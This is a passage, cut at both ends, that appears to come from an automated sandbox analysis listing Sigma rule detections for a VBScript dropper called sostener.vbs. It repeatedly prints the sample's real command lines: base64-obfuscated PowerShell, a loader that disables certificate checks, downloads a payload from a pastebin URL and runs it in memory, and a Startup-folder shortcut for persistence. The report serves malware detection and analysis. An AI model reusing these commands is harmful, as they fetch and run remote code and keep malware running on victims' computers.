gBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
                Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
                Sigma detected: Potentially Suspicious PowerShell Child Processes
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, ProcessId: 6592, ProcessName: wscript.exe
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??Tg
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, ProcessId: 6592, ProcessName: wscript.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\', CommandLine: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\', CommandLine|base64offset|contains: r^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6400, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\', ProcessId: 1088, ProcessName: powershell.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5604, ProcessName: wscript.exe
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1088, TargetFilename: C:\Users\user\AppData\Local\Temp\sostener.vbs
                Sigma detected: PowerShell Download Pattern
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Sigma detected: PowerShell Web Download
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Sigma detected: Startup Folder File Write
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5604, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?